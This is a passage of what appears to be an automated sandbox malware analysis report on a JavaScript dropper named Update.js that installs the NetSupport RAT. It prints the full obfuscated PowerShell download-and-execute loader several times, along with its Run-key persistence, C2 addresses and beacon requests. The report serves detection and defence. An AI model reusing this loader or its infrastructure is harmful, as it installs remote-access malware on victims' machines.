System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System
                                Sigma detected: Script Initiated Connection
                                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 77.83.199.112, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7024, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49705
                                Sigma detected: Suspicious PowerShell Download - PoshModule
                                Source: Event LogsAuthor: Florian Roth (Nextron Systems): Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 9211ea20-9fde-4f00-b3bb-f3062e9844ec Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; Engine Version = 5.1.19041.1682 Runspace ID = 46daa878-c36c-4eaa-b946-d58f3affbc79 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression.FileSystem", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 9211ea20-9fde-4f00-b3bb-f3062e9844ec Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\Cur
                                Sigma detected: Usage Of Web Request Commands And Cmdlets
                                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7024, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ProcessId: 7024, ProcessName: wscript.exe
                                Sigma detected: Non Interactive PowerShell Process Spawned
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7024, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System

                                Remote Access Functionality

                                barindex
                                Sigma detected: Powershell drops NetSupport RAT client
                                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6704, TargetFilename: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\NSM.LIC

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-08T15:23:14.568547+020028277451Malware Command and Control Activity Detected192.168.2.16497085.181.159.137443TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLLReversingLabs: Detection: 13%
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeReversingLabs: Detection: 27%
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exeReversingLabs: Detection: 23%
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,10_2_110ADA40
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 77.83.199.112:443 -> 192.168.2.16:49705 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 77.83.199.112:443 -> 192.168.2.16:49707 version: TLS 1.2
                                Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2533582731.000000006CCA1000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2538791982.00000000747F2000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 0000000A.00000002.2489223815.0000000000442000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000A.00000000.1514998417.0000000000442000.00000002.00000001.01000000.00000008.sdmp, client32.exe.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2538169520.0000000073A85000.00000002.00000001.01000000.0000000A.sdmp, pcicapi.dll.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,10_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,10_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,10_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,10_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,10_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,10_2_1106ABD0

                                Software Vulnerabilities

                                barindex
                                Suspicious execution chain found
                                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.16:49708 -> 5.181.159.137:443
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 77.83.199.112 443Jump to behavior
                                Source: global trafficHTTP traffic detected: GET /trade/da.php?9800 HTTP/1.1Host: ggoryo.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.1.231 104.26.1.231
                                Source: Joe Sandbox ViewASN Name: ASN-MOLMoscowRussiaRU ASN-MOLMoscowRussiaRU
                                Source: Joe Sandbox ViewASN Name: MIVOCLOUDMD MIVOCLOUDMD
                                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: global trafficHTTP traffic detected: POST /trade/fix.php?6867 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ggoryo.comContent-Length: 7Connection: Keep-AliveCache-Control: no-cache
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.137
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.137
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.137
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /trade/da.php?9800 HTTP/1.1Host: ggoryo.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: ggoryo.com
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST /trade/fix.php?6867 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ggoryo.comContent-Length: 7Connection: Keep-AliveCache-Control: no-cache
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.drString found in binary or memory: http://%s/testpage.htm
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: client32.exe, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.drString found in binary or memory: http://127.0.0.1
                                Source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: wscript.exe, 00000000.00000003.1346975876.000001FC5729F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: client32.exe, 0000000A.00000003.1821012459.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1827697976.00000000059EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 0000000A.00000003.1527325191.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1524166542.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1821012459.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1540191948.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.8.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: client32.exe, 0000000A.00000003.1532975213.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1527325191.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1524166542.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1821012459.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1540191948.0000000000F3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspwe
                                Source: client32.exe, 0000000A.00000003.1532975213.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1527325191.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1524166542.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1821012459.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1540191948.0000000000F3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspws
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C01667000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ggoryo.com
                                Source: powershell.exe, 00000008.00000002.1738259741.0000026C1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.drString found in binary or memory: http://ocsp.thawte.com0
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.drString found in binary or memory: http://s2.symcb.com0
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
